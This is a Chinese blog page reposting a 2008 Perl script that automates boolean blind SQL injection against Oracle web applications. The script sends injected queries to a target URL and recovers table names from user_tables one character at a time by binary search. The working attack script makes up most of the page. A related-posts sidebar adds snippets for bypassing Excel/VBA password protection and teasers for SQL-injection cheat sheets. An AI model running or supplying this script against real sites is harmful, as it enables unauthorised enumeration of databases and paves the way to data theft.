oracle %3c%3e与 =区别,oracle注入猜表名 with PERL

最新推荐文章于 2023-12-01 09:11:05 发布
最新推荐文章于 2023-12-01 09:11:05 发布
阅读量260 收藏
点赞数
文章标签: oracle %3c%3e与 =区别

#!/usr/bin/perl -w

#Codz By N3tl04D

#2008-11-26

use strict;

use LWP;

my $browser;

my $start=time();

my $p;

my $word;

my $pass;

&usage if @ARGV!=4;

my $inject=$ARGV[0];

my $key_word=$ARGV[1];

my $start_table=$ARGV[2];

my $save_path=$ARGV[3];

&info;

sub do_GET {

$browser = LWP::UserAgent->new unless $browser;

my $resp = $browser->get(@_);

return ($resp->content, $resp->status_line, $resp->is_success, $resp)

if wantarray;

return unless $resp->is_success;

return $resp->content;

}

my $crack;

for (my $j=$start_table;$j<=300;$j++) {

print "正在测试第$j个表...\n";

cracklen($j,$word);

print "得到表长为$crack\n";

crack($j,$crack);

$crack=0;

}

sub cracklen {

my @dic=(32,16,8,4,2,1);

my $i=0;

my $op=1;

foreach my $pass(@dic)

{

$i++;

$crack+=$op*$pass;

print "大于$crack吗?";

my $url="$inject%20and%20(select%20%20length(table_name)%20from%20(select%20rownum%20r,table_name%20from%20(select%20rownum%20r,table_name%20from%20user_tables%20where%20rownum%3C=$_[0]%20order%20by%201%20desc)%20t%20where%20r%3E$_[0]-1%20order%20by%201)t)>".$crack."%20and%20'1'='1";

print $url;

my ($content, $status, $is_success) = do_GET($url);

if (!$is_success) {

print "网络有问题。等待30秒 $status\n";

sleep 30;

last;

} elsif ($content =~ m/$key_word/)

{

$op=1;

print "        Y\n";

if($i==@dic)

{

$crack++;

}

}

else

{

print "        N\n";

$op=-1;

}

}

return $crack;

}

my $end=time();

my $time=$end-$start;

print "用时".$time."秒\n";

sub crack {

my $word;

OUTER:for (my $i=1;$i<=$_[1];$i++) {

print "正在测试第$i位字母...\n";

my $p1=crackasc($i,$_[0]);

print "得到第$i位为$p1\n";

$word.=$p1;

}

print $word."\n";

save($_[0],$word,$_[1]);

}

sub crackasc {

my @dic=(64,32,16,8,4,2,1);

my $i=0;

my $op=1;

my $crack1;

foreach my $pass(@dic)

{

$i++;

$crack1+=$op*$pass;

print "大于$crack1吗?";

my $url="$inject%20and%20(select%20ascii(substr(table_name,".$_[0].",1))%20from%20(select%20rownum%20r,table_name%20from%20(select%20rownum%20r,table_name%20from%20user_tables%20where%20rownum%3C=".$_[1]."%20order%20by%201%20desc)%20t%20where%20r%3E".$_[1]."-1%20order%20by%201)t)>".$crack1."%20and%20'1'='1";

my ($content, $status, $is_success) = do_GET($url);

if (!$is_success) {

print "网络有问题。等待30秒 $status\n";

sleep 30;

$p=1;

return $p;

} elsif ($content =~ m/$key_word/)

{

$op=1;

print "        Y\n";

if($i==@dic)

{

$crack1+=1;

$p=chr($crack1);

$crack1++;

return $p;

}

}

else

{

print "        N\n";

$op=-1;

if($i==7)

{

$p=chr($crack1);

$crack1++;

return $p;

}

}

}

}

sub save {

open(FILE1,">>$save_path") || die ("Could not open file");

print FILE1 "\n第$_[0]个表长$_[2]名$_[1]";

close(FILE1);

}

sub usage {

print <

ORACLE注入辅助――猜表名

Codz By N3tl04D  2008-11-26

Syntax: $0 inject_point key_word start_table save_path

USAGE

exit 0

}

sub info {

print <

ORACLE注入辅助――猜表名

Codz By N3tl04D  2008-11-26

Syntax: $0 inject_point key_word start_table save_path

INFO

#     exit 0

}

一只雪兔
关注
perl post json
zhaoyangjian724的专栏
01-22 1840
my $res = $ua->post($login_url,{ 'r'=>"-$now", 'lang'=>'zh_CN', 'pass_ticket'=>"$pass_ticket"
oracle %3c=不走索引,Oracle
weixin_39671935的博客
04-04 71
1. ASM Metadata介绍ASM基础概念:ASM的最小存储单位是一个”allocation unit”(AU),通常为1MB,在Exadata上推荐为4MBASM的核心是存储文件文件被划分为多个文件片,称之为”extent”11g之前extent的大小总是为一个AU,11g之后一个extent可以是1 or 8 or 64个AUASM使用file extent map维护文件exte...
如何破解excel打开密码
瓜瓜的笔记
11-22 3388
使用VBA 工程密码破解方法 新建一个excel文档,然后打开,同时按Alt和F11,进入VBA界面 点击菜单上的插入,模块 在新的窗口粘贴以下代码: Sub crack() Dim i As Long Dim FileName As String i = 0 FileName = Application.GetOpenFilename("Excel文件(*.xls & *.xlsx),*.xls;*.xlsx", , "VBA破解") FileName = Right(FileName, Len(
Excl2016密码忘记 破解办法
SHDTC0的博客
04-23 2673
EXCL 2016 破解密码 作为一个IT从业者,大多数人都会遇到各种密码忘记得客户,那么接下来我们先说一种EXCL文件密码破解。 VBA破解 这是一个测试的excl文本,双机打开的时候发现被加密了,密码也忘记了。 第一步 新建一个excl文本 第二步同时按住ALT和F11进入VBA (如下图) 第三部点击插入,模块 第四部将代码复制进去 ###代码在底下 点击运行...
Excel文件加密后忘记密码破解方法
weixin_30888027的博客
06-30 2万+
最好使用VBA 工程密码破解方法 新建一个excel文档,然后打开,同时按Alt和F11,进入VBA界面 点击菜单上的插入,模块 在新的窗口粘贴以下代码: 1 Sub crack() 2 3 Dim i As Long 4 5 Dim FileName As String 6 7 i = 0 8 9 FileName =...
excel密码破解
wudaiming的博客
03-30 821
excel密码破解 新开一Excel,同时按Alt+F11,进入VBA界面,点菜单上的插入,模块,在新出来的窗口粘贴一下代码: Sub crack() Dim i As Long Dim FileName As String i = 0 FileName = Application.GetOpenFilename("Excel文件(*.xls & *.xlsx),*.xls;*.xlsx"...
oracle 19c rac 安装手册
最新发布
m0_38004228的博客
12-01 1597
oracle 19c rac 安装手册
完整记录一则Oracle 11.2.0.4单实例打PSU补丁的过程
热门推荐
weixin_34186128的博客
12-04 6万+
本文记录了打PSU的全过程,意在体会数据库打PSU补丁的整个过程。 1.OPatch替换为最新版本2.数据库软件应用19121551补丁程序3.数据库应用补丁4.验证PSU补丁是否应用成功 1.OPatch替换为最新版本 [oracle@DB usr2]$ id uid=500(oracle) gid=500(oinstall) 组=500(oinstall),501(dba) 环境=...
CentOS7+Apache+PHP7.2+Mariadb环境下安装Snipe-IT资产管理系统[安装全过程]
HOMEV的专栏
03-01 1455
一、环境准备 CentOS 7 + Apache + PHP +Mariadb CentOS 7 (阿里云):http://mirrors.aliyun.com/centos/7.7.1908/isos/x86_64/CentOS-7-x86_64-DVD-1908.iso 二、开始安装 安装前先更新系统 [root@snipeit ~]##开始系统更新 [root@snipeit ~]#...
如何轻松的破解excel 2016工作表密码
wailaizhu的博客
07-28 1万+
如何轻松的破解excel 2016工作表密码 请把以下链接破解流程中的脚本写成我给出的代码 http://jingyan.baidu.com/article/3f16e003f807782591c103bf.html Sub PasswordBreaker() Dim i As Integer, j As Integer, k As Integer Dim l As Integer,
ascc+asp自动注射代码,可以猜后台
2195的专栏
08-31 1928
sqlscan.pl Submitted by superhei on 2004, July 8, 2:17 AM. 我的DD #!/usr/bin/perl #Codz By 黑嘿黑2004/1/21. #Thx MIX $|=1; use IO::Socket; print "===========================================================
一个CRACK程序的破解
qq_42094367的博客
02-11 2215
一个CRACK程序的破解 查看是否有壳 无壳,为c++文件   搜索字符串 can you guess 得到目的函数地址,进入看到如图所示的汇编代码 切到到图表模式,可以看到是通过程序通过eax跳转的,关键的在于call sub_401060,于是查看此函数 通过查看最后的跳转语句,一个是将eax清0 一个是将eax变为1 按F5反编译此函数.如图,通过分析可以知道,这个...
VBA 程序加密破解
nobody
11-09 1万+
VBA程序密码破解:避开VBA工程密码验证,即,骗vba编辑器,该密码输入成功,请求放行。
用VBA破解Excel密码
qq_30934019的博客
05-10 7195
'1、工作表无法编辑,撤销保护 Sub sheet_unprotect() ActiveSheet.Protect AllowFiltering:=True ActiveSheet.Unprotect End Sub '2、工作簿结构无法更改,撤销保护(已测试成功) Sub sheet_visible() ActiveWorkbook.Sheets.Copy For Each sh In ActiveWorkbook.Sheets sh.Visible = True Next End Sub '3、
SQL注入速查表(下)与Oracle注入速查表
CC's Blog
08-27 4760
一、SQL注入速查表(下) 0x00 目录 盲注 关于盲注实战中的盲注实例 延时盲注 WAITFOR DELAY [time](S)实例BENCHMARK()(M)实例pg_sleep(seconds)(P) 掩盖痕迹 -sp_password log bypass(S) 注入测试一些其他的MySQL笔记 MySQL中好用的函数 SQL注入的高级使用
oracle注入猜表名 with PERL
weixin_34413065的博客
08-13 87
#!/usr/bin/perl -w#Codz By N3tl04D#2008-11-26use strict;use LWP; my $browser;my $start=time();my $p;my $word;my $pass;&usage if @ARGV!=4;my $inject=$ARGV[0];my $key_word=$ARGV[1];my $st...
oracle数据库表名和列表规范
俗尘某某
10-26 8933
一、表名和列表规范 1.必须以字母开头 2.长度不能超过30字符 3.不能使用oracle的保留字 4.只能使用如下字符 A-Z,a-z,0-9,$,#等 二、数据类型 1.char    定长 最大2000个字符     例子:char(10) '小明' 前四个字符存放'小明',后面添加6个空格补全,虽然浪费空间,但是查询速度极快. 2.varchar2(20) 变长    最大...
Oracle数据库检测与不存在DUAL情况下的注入技巧
Oracle数据库环境中进行SQL注入攻击时,特别是在不存在预定义的`DUAL`表的情况下,攻击者通常会利用SQL语句的构造来尝试获取敏感信息或执行非授权操作。文档中的示例展示了在没有`DUAL`表支持的情况下,通过精心...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值